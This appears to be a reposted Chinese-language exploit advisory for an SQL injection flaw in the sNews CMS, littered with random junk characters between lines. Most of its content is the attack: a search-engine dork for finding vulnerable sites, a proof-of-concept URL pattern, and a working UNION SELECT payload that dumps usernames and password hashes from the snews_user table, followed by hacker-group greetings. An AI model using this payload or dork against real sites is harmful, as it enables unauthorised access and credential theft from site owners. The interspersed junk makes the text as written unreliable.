标题: CMS snews SQL Injection Vulnerability3 p0 s# Y. j# M# Z
作者: By onestree
w1 X* |0 X4 y( d* W4 a$ f* J* }下载地址 : http://snewscms.com/
2 q! p6 H! G, L& Q" e8 R测试平台 : ubuntu 12.10 / win 78 ]9 a; ^ ]8 \
关键词: inurl:"tanyakan pada rumput yang bergoyang"4 p4 x/ |% O7 K/ d0 d
3 h/ k, J, g4 C3 W4 u7 T
9 |7 s+ j# N' L*************************************************************
: j5 X9 z/ y4 P" F; X
# K) F: \0 E# X7 N& I: ^3 wSQL poc:
+ P6 a2 k) q6 ~ L; B 4 s% H Y5 b* V& ?5 L- ?1 e
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]+ }/ V( V0 @' o) p% L! `
0 `$ m) z. k @) K7 U* i0 N! T- H示例: I. C+ z# A& y9 U
( a' i- H/ {7 U5 ]) d' Ehttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*( z Q( S2 X& H. t
: W& G1 }' s0 w" E
5 L3 Q+ _. M0 F8 Y% o& ]致谢:$ C v7 ^6 ^: D2 K( y
( x+ ?, M y# @: z Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
" u7 n! B5 [; x* q+ s ) @( t7 U& W1 \
indonesiancoder - moeslimh4x0r - go-coder# q- V6 Q. m1 m3 o5 W
. L/ h- D" v) W3 \5 c$ n6 V
spesial my hunny :*
4 s; G) l/ U- E& e8 _& [( I* Q |